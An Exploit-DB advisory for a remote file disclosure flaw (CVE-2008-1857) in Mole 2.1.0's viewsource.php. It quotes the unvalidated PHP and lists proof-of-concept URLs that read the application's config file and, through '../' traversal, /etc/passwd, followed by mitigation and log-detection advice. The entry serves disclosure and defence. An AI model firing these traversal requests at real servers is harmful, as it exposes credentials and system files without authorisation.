Mole 2.1.0 - 'viewsource.php' Remote File Disclosure
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2008-04-06
date_updated: 2016-11-24
verified: 1
codes: OSVDB-44274;CVE-2008-1857
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.commole_2_1_0.zip
# Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability
# Script : http://sourceforge.net/project/showfiles.php?group_id=164171
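# Vuln Code (viewsource.php) :
# Both 'dirn' and 'fname' come straight from the request and are concatenated
# into the path given to highlight_file(), with no validation of either value,
# so the script prints any file the web server account can read.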
##############################################################################
# <html>
# <head>
# <title>Mole: Template viewer</title>
# <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
# </head>
# <body>
#
# <?php
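# $dirn = $_REQUEST['dirn']; <--- request-controlled, never validated
# $fname = $_REQUEST['fname']; <--- request-controlled, never validated
#
#
# highlight_file($dirn.$fname); <--- outputs whatever file the concatenated path names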
# ?>
#
# </body>
# </html>
##############################################################################
# POC :
# /mole_2_1_0/viewsource.php?dirn=include/config.inc.php
# /mole_2_1_0/viewsource.php?fname=include/config.inc.php
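# /mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd
# Note : the first two requests disclose the application's own configuration file
#        (either parameter alone is enough, since the two are simply concatenated);
#        the third leaves the web root through "../" sequences.
# Mitigation : resolve the requested path (e.g. with realpath()) and serve it only
#        if it lies inside the directory the viewer is meant to expose, or map a
#        fixed allow-list of names to files. Remove viewsource.php from production
#        installs if it is not needed.
# Detection : review access logs for viewsource.php requests whose dirn/fname
#        values contain "../", absolute paths, or names outside the expected set.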
##############################################################################
# Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr
##############################################################################
# milw0rm.com [2008-04-07]